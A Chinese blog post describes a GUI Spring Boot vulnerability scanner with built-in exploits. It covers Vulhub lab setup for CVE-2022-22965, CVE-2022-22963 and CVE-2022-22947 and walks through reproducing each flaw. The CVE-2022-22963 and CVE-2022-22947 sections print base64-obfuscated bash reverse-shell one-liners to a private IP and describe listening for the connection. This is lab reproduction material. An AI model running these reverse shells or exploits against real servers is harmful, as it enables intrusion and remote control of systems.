一款GUI版的SpringBoot扫描器
精选
原创
©著作权归作者所有:来自51CTO博客作者CX330Team的原创作品,请联系作者获取转载授权,否则将追究法律责任
注意:本工具内置相关漏洞的Exp,杀软报毒属于正常现象!
Windows使用
python3 SpringBoot-Scan-GUI.py
也可以直接下载执行release打包好的exe程序
Linux使用
python3 SpringBoot-Scan-GUI-Linux.py
或者使用 wine 来执行:
sudo wine SpringBoot-Scan-GUI.exe
VulHub 漏洞测试环境搭建
git clone https:///vulhub/vulhub.git
安装Docker环境
sudo apt-get install
sudo apt install docker-compose
搭建CVE-2022-22965
cd /vulhub/CVE-2022-22965
sudo docker-compose up -d
搭建CVE-2022-22963
cd /vulhub/CVE-2022-22963
sudo docker-compose up -d
搭建CVE-2022-22947
cd /vulhub/CVE-2022-22947
sudo docker-compose up -d
如果报错,自行修改 .yml 文件中映射的端口号
漏洞复现演示
一、CVE-2022-22965
VulHub 环境复现

内置shell

aabysszg-shell

13exp-shell

春秋云境 环境复现
内置shell

13exp-shell

aabysszg-shell

二、CVE-2022-22963
VulHub 环境复现
准备反弹shell:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA1Lzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i} || (Base64)编码内容→ bash -i >& /dev/tcp/192.168.0.105/8888 0>&1
Kali监听对应端口:

漏洞利用


春秋云境 环境复现
注:云境反弹shell需使用公网服务器
服务器监听



三、CVE-2022-22947
VulHub 环境复现
同样准备反弹shell
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA1Lzg4ODkgMD4mMQ==}|{base64,-d}|{bash,-i} || (Base64)编码内容→ bash -i >& /dev/tcp/192.168.0.105/8889 0>&1
kali监听对应端口:

漏洞利用


春秋云境 环境复现

